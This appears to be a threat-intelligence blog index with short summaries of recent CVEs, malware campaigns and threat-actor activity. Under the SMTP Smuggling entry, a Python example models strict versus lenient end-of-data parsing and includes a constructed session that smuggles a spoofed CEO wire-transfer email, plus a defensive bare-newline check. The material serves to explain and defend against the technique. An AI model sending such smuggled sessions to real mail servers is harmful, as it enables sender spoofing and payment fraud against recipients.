CISA Known Exploited Vulnerability Catalog December 2023
For the full CISA KEV Catalog, download the PDF file here. Summary: The Known Exploited Vulnerabilities (KEV) catalog, maintained by CISA, is the authoritative source of vulnerabilities known to have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog, …
Attacks, Vulnerabilities and Actors 1 January to 7 January 2024
For the detailed threat digest, download the PDF file here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of twelve executed attacks, two instances of adversary activity, and three exploited vulnerabilities, highlighting the …
Ivanti Addresses Critical Vulnerability in Endpoint Manager
Summary: Ivanti addressed a critical vulnerability (CVE-2023-39336) in its Endpoint Manager (EPM) software, used by some 40,000 customers worldwide. The flaw, fixed in EPM 2022 Service Update 5, is an unauthenticated SQL injection that could lead to remote code execution in case of core …
Decoding UAC-0050’s Cyber Espionage Playbook
Summary: UAC-0050, a threat actor focused on Ukraine, is using new tactics to spread the Remcos RAT. In its latest campaign, UAC-0050 shows adaptability by evading detection through a covert data-transfer method and bypassing EDR systems. Threat Level – Amber | Attack …
Surging JavaScript Threats Steal Your Secrets
Summary: Threat actors are using malicious JavaScript samples that abuse popular survey sites, low-quality hosting, and web chat APIs to steal sensitive information. In some campaigns they register chatbots under the names of notable figures, such as an Australian footballer. These actors also employ various tactics, including …
SMTP Smuggling Enabling Spoofed Emails to Evade Authentication Protocols
Summary: A new email spoofing technique called “SMTP Smuggling” lets attackers send email with spoofed sender addresses that still passes sender-authentication checks such as SPF and DMARC. The technique abuses inconsistencies in how sending and receiving SMTP servers interpret the end-of-data sequence (the line endings around the terminating “.”): a receiver that accepts a non-standard terminator ends the first message early and treats the rest of the stream as a second, smuggled message with its own envelope. The attack could affect millions of email users, so updating your software …
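As an added example (not code from the original post or from the researchers behind the technique), the following Python models the mechanism in miniature: the same client byte stream is parsed once with the RFC 5321 terminator and once with a lenient terminator set, and the two parsers disagree on how many messages, and which sender envelopes, were delivered. All domains, addresses and message contents are constructed for the example.

```python
import re

# RFC 5321 end-of-data: a line containing only "." terminated by CRLF.
STRICT_EOD = re.compile(rb"\r\n\.\r\n")
# A lenient receiver that also accepts bare LF or bare CR around the ".".
LENIENT_EOD = re.compile(rb"(?:\r\n|\n|\r)\.(?:\r\n|\n|\r)")
# A bare LF (not preceded by CR) or a bare CR (not followed by LF) inside DATA.
BARE_NEWLINE = re.compile(rb"(?<!\r)\n|\r(?!\n)")


def parse_session(raw, eod):
    """Return the messages a server using terminator regex `eod` would accept
    from the client side of an SMTP session (MAIL FROM / RCPT TO / DATA ...).
    Each message is a dict with mail_from, rcpt_to and body."""
    messages = []
    envelope = {"mail_from": None, "rcpt_to": [], "body": None}
    pos = 0
    while pos < len(raw):
        nl = raw.find(b"\r\n", pos)
        if nl == -1:
            break
        line = raw[pos:nl]
        pos = nl + 2
        upper = line.upper()
        if upper.startswith(b"MAIL FROM:"):
            envelope["mail_from"] = line[10:].strip().decode()
        elif upper.startswith(b"RCPT TO:"):
            envelope["rcpt_to"].append(line[8:].strip().decode())
        elif upper == b"DATA":
            # Everything up to the first terminator this server recognises
            # is the message body; the rest of the stream is parsed as commands.
            m = eod.search(raw, pos)
            if m is None:
                raise ValueError("unterminated DATA section")
            envelope["body"] = raw[pos:m.start()].decode()
            messages.append(envelope)
            envelope = {"mail_from": None, "rcpt_to": [], "body": None}
            pos = m.end()
        elif upper == b"QUIT":
            break
    return messages


def smuggles(raw):
    """True if a lenient receiver accepts more messages than a strict one."""
    return len(parse_session(raw, LENIENT_EOD)) > len(parse_session(raw, STRICT_EOD))


def has_bare_newline(raw):
    """Defensive check a hardened receiver applies instead of guessing a
    terminator: refuse any session containing a bare LF or bare CR."""
    return BARE_NEWLINE.search(raw) is not None


# Constructed: what a legitimate outbound server of provider.example relays to
# target.example after the attacker authenticated as attacker@provider.example.
# The smuggled envelope claims a sender the attacker does not control, yet the
# message arrives from the provider's real outbound IP, so SPF for the domain passes.
SESSION = (
    b"MAIL FROM:<attacker@provider.example>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"From: attacker@provider.example\r\n"
    b"Subject: harmless\r\n"
    b"\r\n"
    b"nothing to see here"
    b"\n.\n"                                  # bare-LF terminator: strict servers ignore it
    b"MAIL FROM:<ceo@provider.example>\r\n"   # smuggled second envelope
    b"RCPT TO:<finance@target.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@provider.example\r\n"
    b"Subject: urgent wire\r\n"
    b"\r\n"
    b"please pay invoice 4711"
    b"\r\n.\r\n"                              # the only terminator a strict server accepts
    b"QUIT\r\n"
)

# Constructed: the same first message sent with proper CRLF line endings only.
CLEAN_SESSION = (
    b"MAIL FROM:<attacker@provider.example>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"Subject: harmless\r\n\r\nnothing to see here\r\n.\r\n"
    b"QUIT\r\n"
)

if __name__ == "__main__":
    for name, eod in (("strict", STRICT_EOD), ("lenient", LENIENT_EOD)):
        for i, m in enumerate(parse_session(SESSION, eod)):
            print(f"{name}: message {i} from {m['mail_from']} to {m['rcpt_to']}")
    print("smuggling possible:", smuggles(SESSION))
    print("bare newline present:", has_bare_newline(SESSION))
```

The strict parser returns one message from attacker@provider.example whose body happens to contain SMTP commands as text; the lenient parser returns two, the second carrying the spoofed ceo@provider.example envelope that the inbound server never saw a MAIL FROM check for. The fix is on both sides: the outbound server must not forward bare CR or LF inside DATA, and the inbound server should reject them rather than accept a non-standard terminator, which is what `has_bare_newline` models (Postfix, for example, added the `smtpd_forbid_bare_newline` setting for this purpose).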
Malware Leveraging Google OAuth for Persistent Account Access
Summary: Information-stealing malware is actively abusing an undocumented Google OAuth endpoint called MultiLogin to regenerate Google session cookies and keep access to victim accounts. The technique was first disclosed by a threat actor named PRISMA on their Telegram channel and has since been integrated into several malware-as-a-service (MaaS) stealer families. Threat Level – Amber | Attack …
Attacks, Vulnerabilities and Actors 25 December to 31 December 2023
For the detailed threat digest, download the PDF file here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eight executed attacks, four instances of adversary activity, and five exploited vulnerabilities, highlighting the …
Nim Backdoor Masquerades as Nepal Government Security
Summary: Attackers used malicious Microsoft Word documents disguised as official communications from the Nepali government to trick victims into downloading and executing a backdoor written in the Nim programming language. Because Nim is an uncommon language, it poses challenges for analysis …
Unveiling Novel Malware Waves by APT28
Summary: A recent phishing campaign attributed to the Russia-linked APT28 group has been identified targeting Ukrainian government entities and Polish organizations with email messages urging recipients to click on a link to view a document. The goal is to deploy previously undocumented malware, including OCEANMAP, …